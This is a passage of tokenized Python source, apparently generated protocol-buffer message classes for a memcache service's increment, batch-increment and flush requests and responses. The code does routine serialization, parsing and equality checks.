clear_name_space ( ) <EOL> self . clear_delta ( ) <EOL> self . clear_direction ( ) <EOL> self . clear_initial_value ( ) <EOL> self . clear_initial_flags ( ) <EOL> self . clear_override ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . key_ ) <EOL> if ( self . has_delta_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:16> ) <EOL> out . putVarUint64 ( self . delta_ ) <EOL> if ( self . has_direction_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . 
direction_ ) <EOL> if ( self . has_name_space_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . name_space_ ) <EOL> if ( self . has_initial_value_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarUint64 ( self . initial_value_ ) <EOL> if ( self . has_initial_flags_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . put32 ( self . initial_flags_ ) <EOL> if ( self . has_override_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . override_ . ByteSize ( ) ) <EOL> self . override_ . OutputUnchecked ( out ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_key_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . key_ ) <EOL> if ( self . has_delta_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:16> ) <EOL> out . putVarUint64 ( self . delta_ ) <EOL> if ( self . has_direction_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . direction_ ) <EOL> if ( self . has_name_space_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . name_space_ ) <EOL> if ( self . has_initial_value_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarUint64 ( self . initial_value_ ) <EOL> if ( self . has_initial_flags_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . put32 ( self . initial_flags_ ) <EOL> if ( self . has_override_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . override_ . ByteSizePartial ( ) ) <EOL> self . override_ . OutputPartial ( out ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> self . set_key ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT:16> : <EOL> self . set_delta ( d . getVarUint64 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_direction ( d . getVarInt32 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_name_space ( d . 
getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_initial_value ( d . getVarUint64 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_initial_flags ( d . get32 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) <EOL> d . skip ( length ) <EOL> self . mutable_override ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_key_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . key_ ) ) <EOL> if self . has_name_space_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . name_space_ ) ) <EOL> if self . has_delta_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt64 ( self . delta_ ) ) <EOL> if self . has_direction_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt32 ( self . direction_ ) ) <EOL> if self . has_initial_value_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt64 ( self . initial_value_ ) ) <EOL> if self . has_initial_flags_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatFixed32 ( self . initial_flags_ ) ) <EOL> if self . has_override_ : <EOL> res += prefix + "<STR_LIT>" <EOL> res += self . override_ . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . 
get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> kkey = <NUM_LIT:1> <EOL> kname_space = <NUM_LIT:4> <EOL> kdelta = <NUM_LIT:2> <EOL> kdirection = <NUM_LIT:3> <EOL> kinitial_value = <NUM_LIT:5> <EOL> kinitial_flags = <NUM_LIT:6> <EOL> koverride = <NUM_LIT:7> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT:key>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> <NUM_LIT:4> : "<STR_LIT>" , <EOL> <NUM_LIT:5> : "<STR_LIT>" , <EOL> <NUM_LIT:6> : "<STR_LIT>" , <EOL> <NUM_LIT:7> : "<STR_LIT>" , <EOL> } , <NUM_LIT:7> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:3> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:4> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:5> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:6> : ProtocolBuffer . Encoder . FLOAT , <EOL> <NUM_LIT:7> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:7> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class MemcacheIncrementResponse ( ProtocolBuffer . ProtocolMessage ) : <EOL> OK = <NUM_LIT:1> <EOL> NOT_CHANGED = <NUM_LIT:2> <EOL> ERROR = <NUM_LIT:3> <EOL> _IncrementStatusCode_NAMES = { <EOL> <NUM_LIT:1> : "<STR_LIT:OK>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> } <EOL> def IncrementStatusCode_Name ( cls , x ) : return cls . _IncrementStatusCode_NAMES . 
get ( x , "<STR_LIT>" ) <EOL> IncrementStatusCode_Name = classmethod ( IncrementStatusCode_Name ) <EOL> has_new_value_ = <NUM_LIT:0> <EOL> new_value_ = <NUM_LIT:0> <EOL> has_increment_status_ = <NUM_LIT:0> <EOL> increment_status_ = <NUM_LIT:0> <EOL> def __init__ ( self , contents = None ) : <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def new_value ( self ) : return self . new_value_ <EOL> def set_new_value ( self , x ) : <EOL> self . has_new_value_ = <NUM_LIT:1> <EOL> self . new_value_ = x <EOL> def clear_new_value ( self ) : <EOL> if self . has_new_value_ : <EOL> self . has_new_value_ = <NUM_LIT:0> <EOL> self . new_value_ = <NUM_LIT:0> <EOL> def has_new_value ( self ) : return self . has_new_value_ <EOL> def increment_status ( self ) : return self . increment_status_ <EOL> def set_increment_status ( self , x ) : <EOL> self . has_increment_status_ = <NUM_LIT:1> <EOL> self . increment_status_ = x <EOL> def clear_increment_status ( self ) : <EOL> if self . has_increment_status_ : <EOL> self . has_increment_status_ = <NUM_LIT:0> <EOL> self . increment_status_ = <NUM_LIT:0> <EOL> def has_increment_status ( self ) : return self . has_increment_status_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_new_value ( ) ) : self . set_new_value ( x . new_value ( ) ) <EOL> if ( x . has_increment_status ( ) ) : self . set_increment_status ( x . increment_status ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_new_value_ != x . has_new_value_ : return <NUM_LIT:0> <EOL> if self . has_new_value_ and self . new_value_ != x . new_value_ : return <NUM_LIT:0> <EOL> if self . has_increment_status_ != x . has_increment_status_ : return <NUM_LIT:0> <EOL> if self . has_increment_status_ and self . increment_status_ != x . 
increment_status_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_new_value_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . new_value_ ) <EOL> if ( self . has_increment_status_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . increment_status_ ) <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_new_value_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . new_value_ ) <EOL> if ( self . has_increment_status_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . increment_status_ ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_new_value ( ) <EOL> self . clear_increment_status ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> if ( self . has_new_value_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:8> ) <EOL> out . putVarUint64 ( self . new_value_ ) <EOL> if ( self . has_increment_status_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:16> ) <EOL> out . putVarInt32 ( self . increment_status_ ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_new_value_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:8> ) <EOL> out . putVarUint64 ( self . new_value_ ) <EOL> if ( self . has_increment_status_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:16> ) <EOL> out . putVarInt32 ( self . increment_status_ ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:8> : <EOL> self . set_new_value ( d . getVarUint64 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT:16> : <EOL> self . set_increment_status ( d . getVarInt32 ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . 
has_new_value_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt64 ( self . new_value_ ) ) <EOL> if self . has_increment_status_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt32 ( self . increment_status_ ) ) <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> knew_value = <NUM_LIT:1> <EOL> kincrement_status = <NUM_LIT:2> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> } , <NUM_LIT:2> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . NUMERIC , <EOL> } , <NUM_LIT:2> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class MemcacheBatchIncrementRequest ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_name_space_ = <NUM_LIT:0> <EOL> name_space_ = "<STR_LIT>" <EOL> has_override_ = <NUM_LIT:0> <EOL> override_ = None <EOL> def __init__ ( self , contents = None ) : <EOL> self . item_ = [ ] <EOL> self . lazy_init_lock_ = thread . allocate_lock ( ) <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def name_space ( self ) : return self . name_space_ <EOL> def set_name_space ( self , x ) : <EOL> self . has_name_space_ = <NUM_LIT:1> <EOL> self . name_space_ = x <EOL> def clear_name_space ( self ) : <EOL> if self . has_name_space_ : <EOL> self . has_name_space_ = <NUM_LIT:0> <EOL> self . name_space_ = "<STR_LIT>" <EOL> def has_name_space ( self ) : return self . has_name_space_ <EOL> def item_size ( self ) : return len ( self . item_ ) <EOL> def item_list ( self ) : return self . 
item_ <EOL> def item ( self , i ) : <EOL> return self . item_ [ i ] <EOL> def mutable_item ( self , i ) : <EOL> return self . item_ [ i ] <EOL> def add_item ( self ) : <EOL> x = MemcacheIncrementRequest ( ) <EOL> self . item_ . append ( x ) <EOL> return x <EOL> def clear_item ( self ) : <EOL> self . item_ = [ ] <EOL> def override ( self ) : <EOL> if self . override_ is None : <EOL> self . lazy_init_lock_ . acquire ( ) <EOL> try : <EOL> if self . override_ is None : self . override_ = AppOverride ( ) <EOL> finally : <EOL> self . lazy_init_lock_ . release ( ) <EOL> return self . override_ <EOL> def mutable_override ( self ) : self . has_override_ = <NUM_LIT:1> ; return self . override ( ) <EOL> def clear_override ( self ) : <EOL> if self . has_override_ : <EOL> self . has_override_ = <NUM_LIT:0> ; <EOL> if self . override_ is not None : self . override_ . Clear ( ) <EOL> def has_override ( self ) : return self . has_override_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_name_space ( ) ) : self . set_name_space ( x . name_space ( ) ) <EOL> for i in xrange ( x . item_size ( ) ) : self . add_item ( ) . CopyFrom ( x . item ( i ) ) <EOL> if ( x . has_override ( ) ) : self . mutable_override ( ) . MergeFrom ( x . override ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_name_space_ != x . has_name_space_ : return <NUM_LIT:0> <EOL> if self . has_name_space_ and self . name_space_ != x . name_space_ : return <NUM_LIT:0> <EOL> if len ( self . item_ ) != len ( x . item_ ) : return <NUM_LIT:0> <EOL> for e1 , e2 in zip ( self . item_ , x . item_ ) : <EOL> if e1 != e2 : return <NUM_LIT:0> <EOL> if self . has_override_ != x . has_override_ : return <NUM_LIT:0> <EOL> if self . has_override_ and self . override_ != x . override_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> for p in self . 
item_ : <EOL> if not p . IsInitialized ( debug_strs ) : initialized = <NUM_LIT:0> <EOL> if ( self . has_override_ and not self . override_ . IsInitialized ( debug_strs ) ) : initialized = <NUM_LIT:0> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_name_space_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . name_space_ ) ) <EOL> n += <NUM_LIT:1> * len ( self . item_ ) <EOL> for i in xrange ( len ( self . item_ ) ) : n += self . lengthString ( self . item_ [ i ] . ByteSize ( ) ) <EOL> if ( self . has_override_ ) : n += <NUM_LIT:1> + self . lengthString ( self . override_ . ByteSize ( ) ) <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_name_space_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . name_space_ ) ) <EOL> n += <NUM_LIT:1> * len ( self . item_ ) <EOL> for i in xrange ( len ( self . item_ ) ) : n += self . lengthString ( self . item_ [ i ] . ByteSizePartial ( ) ) <EOL> if ( self . has_override_ ) : n += <NUM_LIT:1> + self . lengthString ( self . override_ . ByteSizePartial ( ) ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_name_space ( ) <EOL> self . clear_item ( ) <EOL> self . clear_override ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> if ( self . has_name_space_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . name_space_ ) <EOL> for i in xrange ( len ( self . item_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . item_ [ i ] . ByteSize ( ) ) <EOL> self . item_ [ i ] . OutputUnchecked ( out ) <EOL> if ( self . has_override_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . override_ . ByteSize ( ) ) <EOL> self . override_ . OutputUnchecked ( out ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_name_space_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . 
name_space_ ) <EOL> for i in xrange ( len ( self . item_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . item_ [ i ] . ByteSizePartial ( ) ) <EOL> self . item_ [ i ] . OutputPartial ( out ) <EOL> if ( self . has_override_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . override_ . ByteSizePartial ( ) ) <EOL> self . override_ . OutputPartial ( out ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> self . set_name_space ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) <EOL> d . skip ( length ) <EOL> self . add_item ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) <EOL> d . skip ( length ) <EOL> self . mutable_override ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_name_space_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . name_space_ ) ) <EOL> cnt = <NUM_LIT:0> <EOL> for e in self . item_ : <EOL> elm = "<STR_LIT>" <EOL> if printElemNumber : elm = "<STR_LIT>" % cnt <EOL> res += prefix + ( "<STR_LIT>" % elm ) <EOL> res += e . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> cnt += <NUM_LIT:1> <EOL> if self . has_override_ : <EOL> res += prefix + "<STR_LIT>" <EOL> res += self . override_ . 
__str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> kname_space = <NUM_LIT:1> <EOL> kitem = <NUM_LIT:2> <EOL> koverride = <NUM_LIT:3> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> } , <NUM_LIT:3> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:3> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:3> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class MemcacheBatchIncrementResponse ( ProtocolBuffer . ProtocolMessage ) : <EOL> def __init__ ( self , contents = None ) : <EOL> self . item_ = [ ] <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def item_size ( self ) : return len ( self . item_ ) <EOL> def item_list ( self ) : return self . item_ <EOL> def item ( self , i ) : <EOL> return self . item_ [ i ] <EOL> def mutable_item ( self , i ) : <EOL> return self . item_ [ i ] <EOL> def add_item ( self ) : <EOL> x = MemcacheIncrementResponse ( ) <EOL> self . item_ . append ( x ) <EOL> return x <EOL> def clear_item ( self ) : <EOL> self . item_ = [ ] <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> for i in xrange ( x . item_size ( ) ) : self . add_item ( ) . CopyFrom ( x . item ( i ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if len ( self . item_ ) != len ( x . item_ ) : return <NUM_LIT:0> <EOL> for e1 , e2 in zip ( self . 
item_ , x . item_ ) : <EOL> if e1 != e2 : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> for p in self . item_ : <EOL> if not p . IsInitialized ( debug_strs ) : initialized = <NUM_LIT:0> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += <NUM_LIT:1> * len ( self . item_ ) <EOL> for i in xrange ( len ( self . item_ ) ) : n += self . lengthString ( self . item_ [ i ] . ByteSize ( ) ) <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += <NUM_LIT:1> * len ( self . item_ ) <EOL> for i in xrange ( len ( self . item_ ) ) : n += self . lengthString ( self . item_ [ i ] . ByteSizePartial ( ) ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_item ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> for i in xrange ( len ( self . item_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putVarInt32 ( self . item_ [ i ] . ByteSize ( ) ) <EOL> self . item_ [ i ] . OutputUnchecked ( out ) <EOL> def OutputPartial ( self , out ) : <EOL> for i in xrange ( len ( self . item_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putVarInt32 ( self . item_ [ i ] . ByteSizePartial ( ) ) <EOL> self . item_ [ i ] . OutputPartial ( out ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) <EOL> d . skip ( length ) <EOL> self . add_item ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> cnt = <NUM_LIT:0> <EOL> for e in self . 
item_ : <EOL> elm = "<STR_LIT>" <EOL> if printElemNumber : elm = "<STR_LIT>" % cnt <EOL> res += prefix + ( "<STR_LIT>" % elm ) <EOL> res += e . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> cnt += <NUM_LIT:1> <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> kitem = <NUM_LIT:1> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> } , <NUM_LIT:1> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:1> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class MemcacheFlushRequest ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_override_ = <NUM_LIT:0> <EOL> override_ = None <EOL> def __init__ ( self , contents = None ) : <EOL> self . lazy_init_lock_ = thread . allocate_lock ( ) <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def override ( self ) : <EOL> if self . override_ is None : <EOL> self . lazy_init_lock_ . acquire ( ) <EOL> try : <EOL> if self . override_ is None : self . override_ = AppOverride ( ) <EOL> finally : <EOL> self . lazy_init_lock_ . release ( ) <EOL> return self . override_ <EOL> def mutable_override ( self ) : self . has_override_ = <NUM_LIT:1> ; return self . override ( ) <EOL> def clear_override ( self ) : <EOL> if self . has_override_ : <EOL> self . has_override_ = <NUM_LIT:0> ; <EOL> if self . override_ is not None : self . override_ . Clear ( ) <EOL> def has_override ( self ) : return self . has_override_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_override ( ) ) : self . 
mutable_override ( ) . MergeFrom ( x . override ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_override_ != x . has_override_ : return <NUM_LIT:0> <EOL> if self . has_override_ and self . override_ != x . override_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( self . has_override_ and not self . override_ . IsInitialized ( debug_strs ) ) : initialized = <NUM_LIT:0> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_override_ ) : n += <NUM_LIT:1> + self . lengthString ( self . override_ . ByteSize ( ) ) <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_override_ ) : n += <NUM_LIT:1> + self . lengthString ( self . override_ . ByteSizePartial ( ) ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_override ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> if ( self . has_override_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putVarInt32 ( self . override_ . ByteSize ( ) ) <EOL> self . override_ . OutputUnchecked ( out ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_override_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putVarInt32 ( self . override_ . ByteSizePartial ( ) ) <EOL> self . override_ . OutputPartial ( out ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) <EOL> d . skip ( length ) <EOL> self . mutable_override ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . 
skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_override_ : <EOL> res += prefix + "<STR_LIT>" <EOL> res += self . override_ . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> koverride = <NUM_LIT:1> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> } , <NUM_LIT:1> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:1> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class MemcacheFlushResponse ( ProtocolBuffer . ProtocolMessage ) : <EOL> def __init__ 